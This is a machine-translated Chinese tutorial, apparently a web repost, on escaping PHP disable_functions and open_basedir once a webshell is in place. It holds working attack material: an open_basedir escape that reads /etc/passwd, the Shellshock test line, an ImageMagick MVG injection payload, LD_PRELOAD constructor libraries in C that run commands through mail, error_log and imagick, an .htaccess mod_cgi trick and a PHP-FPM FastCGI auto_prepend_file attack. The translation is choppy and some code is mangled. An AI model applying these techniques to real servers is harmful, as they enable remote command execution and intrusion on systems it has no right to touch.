Shulou(Shulou.com)05/31 Report--

Today, I will talk to you about the principle and usage of disable bypass in php, which may not be well understood by many people. in order to make you understand better, the editor has summarized the following content for you. I hope you can get something according to this article.

Bypass disable function

Have you ever struggled to get a webshell only to find that you can't even execute a scandir? It's a pleasure to take webshell, but sometimes it's just the end of a small stage; this article will summarize the various poses of bypass disable function from beginning to end with webshell.

Bypass function filtering (through this lab, we learn to bypass mysql_real_escape_string () and addslashes () in a wide byte way. )

Get available information from phpinfo

Information collection is an indispensable part; usually, after we have successfully executed the code or through various previous work and found a phpinfo page, we will collect some available information from that page to find subsequent vulnerabilities.

I would like to talk about some of my personal biases:

Version number

The most intuitive is the php version number (although it sometimes appears in the response header), such as the version number on my machine is:

PHP Version 7.2.9-1

After finding the version number, we will comprehensively see if there are any "version exclusive" vulnerabilities that can be exploited.

DOCUMENT_ROOT

The next step is to search DOCUMENT_ROOT to get the current path to the site, although it is common in / var/www/html, but there are bound to be exceptions.

Disable_functions

This is the focus of this article. Disable_functions functions are disabled as its name implies. Taking the author's kali environment as an example, the following functions are disabled by default:

For example, some ctf questions will make the disable setting extremely disgusting, even if we find that there is nothing we can do after uploading the horse to the website, then the bypass at this time is the content of this article.

Open_basedir

This configuration limits the path that the current php program can access, as set by the author:

But you'll find that what's amazing is that you can only enumerate files in the root directory.

Chdir () and ini_set ()

Chdir is to change the current work path.

Mkdir ('test'); chdir (' test'); ini_set ('open_basedir','..'); chdir ('..'); ini_set ('open_basedir','/'); echo file_get_contents (' / etc/passwd')

Taking advantage of the design flaw in ini_set 's open_basedir, you can observe the bypass process with the following code:

Other

For example, the execution of the command is in fact not affected by open_basedir.

Bypass disable function

There is a test environment for all kinds of disable in the ant sword project warehouse, and the master who needs the environment can choose the ant sword environment.

Https://github.com/AntSwordProject/AntSword-Labs

Blacklist breakthrough

This should be the easiest way to find alternative functions to execute, such as system can use backquotes instead of executing commands.

Look at several common functions used to execute system commands:

System,passthru,exec,pcntl_exec,shell_exec,popen,proc_open, ``

Of course, these often appear in disable function, so you can find functions that can be easily ignored and execute commands through a combination of or functions.

Back quotation marks: the most easily ignored point, execute the command but echo needs to cooperate with other functions, you can bounce shell

Pcntl_exec: if python exists on the target machine, you can use php to perform python bounce shell

ShellShock principle

The essence is to take advantage of bash shell-breaking vulnerability (CVE-2014-6271).

The scope of influence lies in bash 1.14-4.3.

The key is:

Current bash scripts support custom functions by exporting environment variables, or you can pass custom bash functions to child-related processes. In general, the code inside the function will not be executed, but this vulnerability will incorrectly execute commands outside the "{}" brackets.

Local authentication method:

Execute the following command in shell:

Env bash'() {:;}; echo Vulnerable CVE-2014-6271 'bash-c "echo test"

After executing the command, if Vulnerable CVE-2014-6271 is displayed, there is a vulnerability in the certificate system, which can be changed from echo Vulnerable CVE-2014-6271 to arbitrary command execution.

For details, see: https://www.antiy.com/response/CVE-2014-6271.html

Because it is to set the environment variable, and there is a putenv in php that can set the environment variable, cooperate with the opening child process to let it execute the command.

Utilization

Https://www.exploit-db.com/exploits/35146

After uploading exp, you can execute the system command bypass disable, so you don't have to repeat it too much.

ImageMagick principle

The flaw stems from CVE-2016-3714 ImageMagick is a picture processing program, but when a user passes in a malicious picture, it will cause command injection, such as ssrf, file reading, etc., of course, the most deadly must be command injection.

After the loophole comes out, you think that ImageMagick is also used in the php expansion, of course, there is the possibility of loophole, and because the principle of the vulnerability is the direct execution of system commands, there is no possibility of being disable, so it can be used for bypass disable.

For more detailed vulnerability analysis, please see p God's article: CVE-2016-3714-ImageMagick command execution analysis, I directly extracted the more general description of the vulnerability in the original text:

The POC given in the vulnerability report takes advantage of the following delegate:

When it parses the https image, it uses the curl command to download it, and we see that% M is placed directly in the last parameter of curl. ImageMagick supports an image format called mvg by default, while mvg is similar to svg format, in which vector graphics are written as text, which can include https processing.

So we can construct an image in .mvg format (but the file name may not be .mvg. For example, the file containing payload in the following image is named vul.gif, and ImageMagick will recognize it as a mvg image based on its contents), and close the double quotation marks after https:// to write the command you want to execute:

Push graphic-contextviewbox 0 0640 480fill 'url (https://"|id; ")' pop graphic-context

In this way, ImageMagick will trigger a vulnerability when it normally performs image conversion and processing.

The exploitation of the vulnerability is extremely simple. You only need to construct a malicious image and new a class to trigger the vulnerability:

LD_PRELOAD

LD_PRELOAD, which I like to hear and see, is the first bypass disable way I encountered when I was learning web. Personally, I think it's very interesting.

Principle

LD_PRELOAD is an environment variable of the Linux system, which can affect the run-time Runtime linker of the program. It allows you to define dynamic link libraries that are loaded first before the program runs. This function is mainly used to selectively load the same functions in different dynamic link libraries. Through this environment variable, we can load other dynamic link libraries between the main program and its dynamic link library, or even overwrite the normal function library. On the one hand, we can use our own or better functions (without other people's source code) with this function, and on the other hand, we can also achieve specific goals by injecting programs into other people's programs.

The key to our bypass is to make use of the priority of LD_PRELOAD loading libraries to make our own dynamic link libraries take precedence over normal function libraries, so as to execute system commands.

Because the id command is easy to observe, the online articles are more or less the same, using getuid/getgid under the id command to do the test.

Let's first look at the calling function of the id command:

Strace-f / usr/bin/id

Resulut:

Close (3) = 0geteuid32 () = 0getuid32 () = 0getegid32 () = 0getgid32 () = 0 (omit....) getgroups32 (0, NULL) = 1getgroups32 (1) [0]) = 1

Here you can see that there are many functions that can be written. I chose getgroups32, and we can use the man command to look at the definition of the function:

Man getgroups32

See this part:

With the definition of the function, we just need to write the getgroups inside it, so I write a hack.c:

# include # include # include int getgroups (int size, gid_t list []) {unsetenv ("LD_PRELOAD"); system ("echo'i hack it'"); return 1;}

Then compile into a dynamic link library using gcc:

Gcc-shared-fPIC hack.c-o hack.so

Using LD_PRELOAD to load and execute the id command, we get the following result:

To change the uid test, let's first adduser a new user hhhm. The result of executing the id command is as follows:

Then follow the above steps to get the function definition of getuid32, and write a hack.c based on it:

# include # include uid_t geteuid (void) {return 0;} uid_t getuid (void) {return 0;} uid_t getgid (void) {return 0;}

After the gcc is compiled and executed, the result is as follows:

You can see that our uid successfully changed to 1 and changed to root, of course, because our hack.so is compiled by root permissions, it may be possible to use this way to raise rights under certain conditions, and there are related articles on the Internet, but I will not make an over-affirmative statement without actually trying.

Let's take a look at how to achieve bypass disable in php.

Utilization in php

In php, you mainly need to cooperate with the putenv function, so if the function is ban, then it will be fine, so before bypass, you need to see whether disable ban putenv.

The use of php according to the articles of the masters, I mainly extract the following ways of use, which are more or less the same in essence. We need to find a function and then use the same mechanism to overwrite its function and execute system commands.

Then we are limited by disable,system and other functions that execute system commands can not be used, and if we want to let php call external programs to further achieve the execution of system commands in order to achieve bypass can only rely on the php interpreter itself.

So there is a major premise that you need to start the process from the php interpreter.

The old-fashioned mail

First select a machine with sendmail, the author is to use kali, first write the following code in php

The running effect of visiting the page is as follows:

To mention another point that I went wrong in the process of using, here, for testing, I switched to a ubuntu without sendmail:

But if we follow the above steps to directly track the execution of index without filtering the selected execve, we will find that geteuid also exists, and this is actually called by sh rather than mail, so if we use php index.php to call, we will find that the system execution is successful, but if we visit it through the page, we will find that the execution failed, which is a point that needs to be paid attention to in the process of utilization. This is why we use pipe characters to select execve.

The first execve is the process started by the php interpreter, which is the sendmail child process we need.

Error_log

Similarly, in addition to mail calling sendmail, there are also error_log calls, as shown in the figure:

Ps: sendmail is called when the type of error_log is 1.

Therefore, the above routine for the mail function is also applicable to error_log, however, we will find that this kind of hijacking is only aimed at a certain function, and what we have done before is dependent on sendmail, and for example, if the target machine does not have sendmail, then the previous method is completely useless.

Master yangyangwithgnu does not need sendmail in his article: skillfully using LD_PRELOAD to break through disable_functions mentioned that we should not be limited to hijacking a function, but should consider hijacking shared objects.

Hijack shared object

A library written in the following code is used in this paper:

# define _ GNU_SOURCE#include # include # include _ _ attribute__ ((_ _ constructor__)) void anything (void) {unsetenv ("LD_PRELOAD"); system ("ls > test");}

So the personal understanding of _ _ attribute__ ((_ _ constructor__)) is that it will run when the shared library is loaded, that is, when the program starts, then the utilization of this step also requires the premise of the promoter process mentioned above, that is, functions like mail and Imagick that can enable the php interpreter to start a new process.

Similarly, if you specify LD_PRELOAD as a shared library compiled by gcc, and then visit the page to view it, you will find that ls was successfully written to test (if it fails, please check the write permission issue)

The problem in Wallbreaker Easy in 0ctf 2019 is that imagick will call ffmpeg when dealing with some specific suffix files, that is, it will start child processes, thus loading the shared library and executing the system command bypass disable.

Apache Mod CGI

Both of the previous two uses require putenv, which is needed if putenv is ban. Give a brief introduction to how it works.

Principle

Using htaccess to overwrite apache configuration and adding cgi programs to execute system commands is in fact more or less the same as uploading htaccess parsing png files into php programs.

Mod cgi:

Any file that has the MIME type application/x-httpd-cgi or is processed by the cgi-script processor will be treated as a CGI script and run by the server, and its output will be returned to the client. You can make a file an CGI script in two ways, one is that the file has an extension defined by the AddType directive, and the other is that the file is located in the ScriptAlias directory.

So we just need to upload an .htaccess:

Options + ExecCGI / / causes the execution of the cgi program to AddHandler cgi-script. Test / / parses the file with the test suffix into the cgi program

It's easy to use:

Upload htaccess for the content given above

Upload a.test with the following contents:

#! / bin/bashecho&&ls

Give a.test permission and access to get the execution result.

PHP-FPM

Php-fpm believes that some readers will encounter it when configuring the php environment. For example, when using nginx+php, the configuration file will be configured as follows:

Location ~ .php ${root html;fastcgi_pass 127.0.0.1 index.php;fastcgi_param SCRIPT_FILENAME document_root$fastcgi_script_name;include fastcgi_params;}

So take a look at the introduction to php-fpm in Baidu Encyclopedia:

PHP-FPM (FastCGI Process Manager:FastCGI process Manager) is a PHPFastCGI manager, for php before PHP 5.3.3, it is a patch pack [1] designed to integrate FastCGI process management into the PHP package. If you are using a pre-PHP5.3.3 PHP, you must patch it into your PHP source code before you can use it after compiling and installing PHP.

So what is fastcgi? Fastcgi is a communication protocol used for data exchange between Web server and back-end language.

Principle

If we visit http://127.0.0.1/test.php?test=1 after configuring php-fpm, it will be resolved as the following key-value pair:

{'GATEWAY_INTERFACE':' FastCGI/1.0', 'REQUEST_METHOD':' GET', 'SCRIPT_FILENAME':' / var/www/html/test.php', 'SCRIPT_NAME':' / test.php', 'QUERY_STRING':'? test=1', 'REQUEST_URI':' / test.php?test=1', 'DOCUMENT_ROOT':' / var/www/html' 'SERVER_SOFTWARE':' php/fcgiclient', 'REMOTE_ADDR':' 127.0.0.1, 'REMOTE_PORT':' 12304, 'SERVER_ADDR':' 127.0.0.1, 'SERVER_PORT':' 80, 'SERVER_NAME': "localhost,' SERVER_PROTOCOL': 'HTTP/1.1'}

This array looks familiar and you will find that it is actually part of $_ SERVER, so php-fpm will find the value of SCRIPT_FILENAME after getting this array, for the / var/www/html/test.php here, and then execute it.

The author left a configuration earlier. In the configuration, we can see that the port of fastcgi is 9000 and the listening address is 127.0.0.1. If the address is 0.0.0.0, that is, if we expose it to the public network, if we fake communication with fastcgi, this will lead to remote code execution.

Well, in fact, php-fpm communication methods include tcp, that is, port 9000, and socket communication, so there are also two kinds of attacks.

In socket mode, the configuration file will be as follows:

Fastcgi_pass unix:/var/run/phpfpm.sock

So we can take a look at the protocol composition of fastcgi, which consists of multiple record. Here is an excerpt of a structure in the original text of p God:

Typedef struct {/ * Header * / unsigned char version; / version unsigned char type; / / the type of this record unsigned char requestIdB1; / / the size of the request id unsigned char requestIdB0; unsigned char contentLengthB1; / / body body corresponding to this record / / extra block size unsigned char reserved; / * Body * / unsigned char contentData [contentLength]; unsigned char paddingData [paddingLength];} FCGI_Record

You can see that record is divided into header and body, where header is fixed at 8 bytes, while body is determined by its contentLength, while paddingData is reserved, and the length is set to 0 when not needed.

The value of type varies from 1 to 7, and when it type=4, the backend parses its body into key-value. Key-value may look familiar, yes, the key-value pair array we saw earlier, that is, the environment variable.

So before we learn to exploit vulnerabilities, we need to understand two environment variables.

PHP_VALUE: the option to set the mode to PHP_INI_USER and PHP_INI_ALL

PHP_ADMIN_VALUE: all options can be set (except disable_function)

Then we need to meet three conditions in the way we use it in the divine text:

Find a known php file

Use the above two environment variables to set auto_prepend_file to php://input

The conditions that must be met to enable php://input: allow_url_include is on

At this point familiar with the file contains loopholes in the children's shoes at a glance, we can execute arbitrary code.

The situation used here is:

'PHP_VALUE':' auto_prepend_file = php://input''PHP_ADMIN_VALUE': 'allow_url_include = On' utilization

Let's first look directly at how phpinfo identifies whether we can exploit this vulnerability.

Then take attacking tcp as an example. If we forge nginx to send data (data encapsulated by fastcgi) to php-fpm, this will cause arbitrary code execution vulnerabilities.

P God has written an exp, because the situation of opening the fastcgi to 0.0.0.0 is actually similar to attacking the private network, so you can try to attack 127.0.0.1, that is, attacking the private network. In fact, we can cooperate with the gopher protocol to attack the private network fpm, because it is not consistent with the topic of this article.

Python a.py 127.0.0.1-p 9000 / var/www/html/phpinfo.php-c''

You can see the result as shown in the figure:

After the attack is successful, let's check the phpinfo and see the following:

In other words, the attack package we constructed is:

{'GATEWAY_INTERFACE':' FastCGI/1.0', 'REQUEST_METHOD':' GET', 'SCRIPT_FILENAME':' / var/www/html/phpinfo.php', 'SCRIPT_NAME':' / phpinfo.php', 'QUERY_STRING':', 'REQUEST_URI':' / phpinfo.php', 'DOCUMENT_ROOT':' / var/www/html', 'SERVER_SOFTWARE':' php/fcgiclient' 'REMOTE_ADDR':' 127.0.0.1, 'REMOTE_PORT':' 12304, 'SERVER_ADDR':' 127.0.0.1, 'SERVER_PORT':' 80, 'SERVER_NAME': "localhost,' SERVER_PROTOCOL': 'HTTP/1.1',' PHP_VALUE': 'auto_prepend_file = php://input' 'PHP_ADMIN_VALUE': 'allow_url_include = On'}

Obviously, what I said above is true; however, in fact, I did not join disable here, so let's add disable to it and try again.

Pkill php-fpm/usr/sbin/php-fpm7.0-c / etc/php/7.0/fpm/php.ini

Note that you need to specify ini to restart fpm after modifying the ini file.

I put a system in disable:

Pcntl_alarm,system,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority

Then execute exp again, and you can find that it has been disable:

Therefore, this method can not achieve the role of bypass disable, so don't forget that our two php_value can modify not only auto_prepend_file, but also basedir to bypass. In the previous bypass posture, we used the so file execution extension library to bypass, then here you can also modify the so library written by extension for us to execute system commands, specifically using the script that has been written by a master, in fact, the plug-in in Ant Sword has been able to achieve the function of the bypass, then I will directly make a brief analysis of how the plug-in in Ant Sword implements bypass.

When executing the plug-in of Ant Sword, you will find that it generates a .antproxy.php file in the current directory, so our subsequent bypass is executed through this file, so take a look at the code of this shell:

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.